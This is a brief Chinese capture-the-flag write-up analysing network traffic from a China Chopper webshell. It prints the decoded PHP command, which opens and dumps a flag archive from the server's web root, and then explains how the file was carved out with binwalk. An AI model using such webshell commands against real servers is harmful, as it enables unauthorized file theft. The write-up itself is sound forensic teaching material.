1. 程式人生 > >Bugku 分析 中國菜刀

Bugku 分析 中國菜刀

php代碼 play spa die() close ech res sse error:

解壓之後得到了一個流量包,只有不到10KB,美滋滋

先抓重點,過濾出http,只有6條數據記錄,3條post,3條response,3條post都是一樣的

隨便打開一條pos

是一個assert斷言,斷言內容是一串base64加密的字符串(最後的%3D先解碼為=)

得到了一串php代碼

@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<\‘5.3.0\‘)
{
    @set_magic_quotes_runtime(0);
};
echo("X@Y");
$F="C:\\\\wwwroot\\\\flag.tar.gz";
$fp=@fopen($F,\‘r\‘);
if(@fgetc($fp))
{
    @fclose($fp);
    @readfile($F);
}
else
{
    echo(\‘ERROR:// Can Not Read\‘);
};
echo("X@Y");
die();

就是說打印一個叫flag(等等flag?)的文件,並在前後打印X@Y

快樂,只要找到flag.tar.gz就好了

最後一條response中就有這個文件

既然是一個文件中包含另一個文件,那就試一試binwalk

提取並解壓,即可得到flag

Bugku 分析 中國菜刀